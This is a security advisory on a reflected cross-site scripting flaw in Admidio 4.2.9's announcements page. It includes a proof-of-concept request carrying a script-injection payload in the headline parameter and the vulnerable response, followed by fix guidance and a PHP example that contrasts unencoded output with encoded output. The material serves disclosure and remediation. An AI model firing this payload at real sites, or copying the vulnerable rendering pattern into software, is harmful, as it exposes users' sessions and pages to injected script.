Cross site scripting in Admidio 4.2.9 via headline parameter in admidio/admidio
Jun 18th 2023
Cross-site Scripting (XSS) is a client-side code injection attack in which an attacker causes malicious scripts to execute in the context of a legitimate website or web application. XSS occurs when a web application includes unvalidated or unencoded user input in the output it generates.
Proof of Concept
URL: http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php
Vulnerable Parameter: headline
Details: The URL-encoded GET input headline was set to Announcements"><script>alert(9370)</script>
The input is reflected inside a tag parameter between double quotes.

Request:

GET /admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script> HTTP/1.1
Referer: http://localhost/admidio-4.2.9/
Cookie: ADMIDIO_admidio_adm_SESSION_ID=1vv2p802t9j8fiek592n3p6uqj; ADMIDIO_admidio_adm_cookieconsent_status=dismiss
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/184.108.40.206 Safari/537.36
Host: localhost
Connection: Keep-alive

Response (excerpt): the full request URL, payload included, is echoed back unencoded inside the error message, so the injected script element lands in the page as markup.

<p class="lead">The URL in the field <strong>http://localhost/admidio-4.2.9/adm_program/modules/announcements/announcements.php?cat_uuid=0&headline=Announcements"><script>alert(9370)</script></strong> contains invalid characters.<br /><br />Only alphabetic characters, umlauts, numbers 0-9 and special characters .-+_:/#?= are allowed.</p>
How to fix this vulnerability:
Apply context-dependent output encoding to user input rendered on a page (HTML entity encoding for element text and attribute values, with the encoder chosen for the context the value lands in), and validate the headline parameter against an allow-list before using it. Note that the application already rejects the URL as containing invalid characters, but the rejection message itself echoes the offending value unencoded; validation alone is therefore not sufficient, and the error path must encode the value at the point of output like every other path.
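The following is an added example, not Admidio's own code. It models the error path seen in the proof of concept as a small stand-in: an error message that echoes the request URL back to the user. The function names (renderErrorVulnerable, renderErrorFixed, htmlText, isAllowedHeadline) and the relative URL are assumptions for illustration; the payload is the one from the PoC above, and the allow-list regex mirrors the character set the error message itself names.

```php
<?php
// Added example, not Admidio's own code. A minimal stand-in for an error
// path that echoes the request URL (and so the headline parameter) back
// into the HTML response.

declare(strict_types=1);

// Constructed sample input: the payload from the proof of concept.
$payload = 'Announcements"><script>alert(9370)</script>';

// Vulnerable pattern: the raw query value is concatenated into HTML, so
// "<script>" reaches the browser as markup and executes.
function renderErrorVulnerable(string $headline): string
{
    $url = 'announcements.php?cat_uuid=0&headline=' . $headline;   // hypothetical path
    return '<p class="lead">The URL in the field <strong>' . $url
         . '</strong> contains invalid characters.</p>';
}

// Encoder for the HTML element/attribute context. ENT_QUOTES encodes both
// quote styles so the same helper is safe inside double- or single-quoted
// attributes; ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an
// empty string, which would otherwise silently blank the error text.
function htmlText(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened: the value is encoded at the point of output, including on the
// rejection path. The message still shows the user what was rejected, but
// as inert text.
function renderErrorFixed(string $headline): string
{
    $url = 'announcements.php?cat_uuid=0&headline=' . $headline;   // hypothetical path
    return '<p class="lead">The URL in the field <strong>' . htmlText($url)
         . '</strong> contains invalid characters.</p>';
}

// Allow-list validation matching the characters the error message permits:
// letters (including umlauts, via \p{L} with the u modifier), digits, and
// .-+_:/#?=. Validation complements output encoding; it does not replace it.
function isAllowedHeadline(string $value): bool
{
    return preg_match('/^[\p{L}\p{N}.\-+_:\/#?=]+$/u', $value) === 1;
}

// Demonstration: same payload through both render paths.
$vuln  = renderErrorVulnerable($payload);
$fixed = renderErrorFixed($payload);

// The vulnerable output carries an executable script element...
assert(str_contains($vuln, '<script>alert(9370)</script>'));
// ...while the fixed output contains only encoded, inert text.
assert(!str_contains($fixed, '<script>'));
assert(str_contains($fixed, '&lt;script&gt;alert(9370)&lt;/script&gt;'));
// The allow-list accepts the legitimate value and rejects the payload.
assert(isAllowedHeadline('Announcements') === true);
assert(isAllowedHeadline($payload) === false);

echo $fixed, PHP_EOL;
```

Run with `php -d zend.assertions=1 example.php` so the assertions are evaluated; the printed line shows the rejected URL rendered as escaped text rather than as markup. The point of the design is that the encoder is applied to the value at the moment it is written into HTML, regardless of whether validation earlier in the request passed or failed.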